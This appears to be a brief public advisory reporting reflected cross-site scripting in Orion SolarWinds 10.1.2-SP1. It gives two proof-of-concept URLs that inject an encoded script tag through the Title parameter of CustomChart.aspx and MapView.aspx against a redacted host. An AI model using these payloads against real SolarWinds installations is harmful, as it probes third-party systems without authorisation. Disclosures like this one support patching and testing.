Orion SolarWinds version 10.1.2-SP1 suffers from a cross site scripting vulnerability.
fdd0399b1492e10c58ab627852ef2be1e2971ed2b7f7f0375473bf6d303e2dee
Software : Orion SolarWinds 10.1.2 - SP1
XSS
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
http://orion.xxx.xxx/Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRTLoss&NetObject=N:355&ResourceID=17&NetObjectPrefix=N&Rows=&Title=%3Cscript%3Ealert%28%27ALERTA%27%29%3C/script%3E
http://orion.xxx.xxx/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813
f-231270=0225b7.OrionMap&Title=%3Cscript%3EALERTA%28%27test%27%29%3C/scri
pt%3E
-----------------------------------------------------------------------------------------------------------------------------------------------------------------